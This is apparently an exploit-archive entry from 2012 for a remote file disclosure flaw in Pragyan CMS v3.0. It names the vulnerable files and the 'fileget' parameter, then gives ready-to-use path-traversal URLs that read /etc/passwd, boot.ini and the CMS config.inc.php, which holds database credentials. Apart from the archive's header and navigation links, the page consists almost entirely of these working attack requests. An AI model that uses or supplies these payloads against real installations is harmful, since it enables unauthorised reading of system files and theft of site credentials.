Pragyan CMS v 3.0 Remote File Disclosure

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Pragyan CMS v 3.0 Remote File Disclosure
# Published : 2012-01-10
# Author :
# Previous Title : phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection
# Next Title : Pragyan CMS 2.6.1 Arbitrary File Upload Vulnerability

Title    
Pragyan CMS v 3.0 => [Remote File Disclosure] 
Author   
Or4nG.M4n
Download 
http://space.dl.sourceforge.net/project/pragyan/pragyan/3.0/PragyanCMS-v3.0-beta.tar.bz2

vuln
download.lib.php line 16
vuln
index.php line 234

$_GET['fileget']
 
exploit  http://localhost/Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../  etc/passwd . boot.ini

Download Config file 
exploit  /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../appserv/www/Pragyan/cms/config.inc.php
exploit  /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../home/exploitdb/public_html/Pragyan/cms/config.inc.php